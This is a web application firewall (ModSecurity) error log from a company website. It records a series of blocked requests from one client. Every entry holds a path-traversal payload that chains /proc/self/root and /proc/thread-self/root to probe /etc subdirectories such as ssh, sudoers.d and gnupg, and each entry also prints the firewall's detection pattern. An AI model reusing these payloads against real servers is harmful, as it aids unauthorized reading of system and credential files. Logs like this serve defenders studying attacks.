[Mon Mar 16 10:01:16.464687 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:50872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_G3bQATo66fKoS7w9FgAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:17.755097 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:50886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_HdSswJuvopo3lOhQPwAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:18.938398 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.241.46:51116] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_Hv9ocpUE4ed4uDzc8gAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:21.266251 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.241.46:51128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_IZqj1wV0Si-OkefZrQAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:23.563179 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:51130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_I5qj1wV0Si-OkefZsQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:28.091249 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.241.46:51146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_KBXjF1vJNtV6CWrpNQAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:29.382970 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:45944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_Kf9ocpUE4ed4uDzc_QAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:31.756872 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.241.46:45958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_K5qj1wV0Si-OkefZtQAAAAM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:34.079977 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:45974] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_LglT9VtDQc7bgUycMAAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:36.427238 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:45990] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_MHjZBu2q05ozVU9GNAAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:38.785461 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:45998] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_MrABkC4fWIHEf8Ha-wAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:40.230696 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:53112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_NJqj1wV0Si-OkefZuwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:41.430663 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.241.46:53124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_NbysWC90G-1nBrA1SwAAAYw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:43.707514 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:53136] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_NrysWC90G-1nBrA1TgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:46.037950 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.241.46:53148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_OnjZBu2q05ozVU9GPgAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:49.905261 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:53160] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_PI6lpbStxTqkSkte4AAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:53.570298 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.241.46:35296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_QXbQATo66fKoS7w9JQAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:01:59.063739 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:35312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_R7ABkC4fWIHEf8HbCAAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:00.340209 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:49444] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_SI6lpbStxTqkSkte5AAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:04.836832 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.241.46:49458] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_THbQATo66fKoS7w9LgAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:02:06.130453 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:49460] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf_Tpqj1wV0Si-OkefZxwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
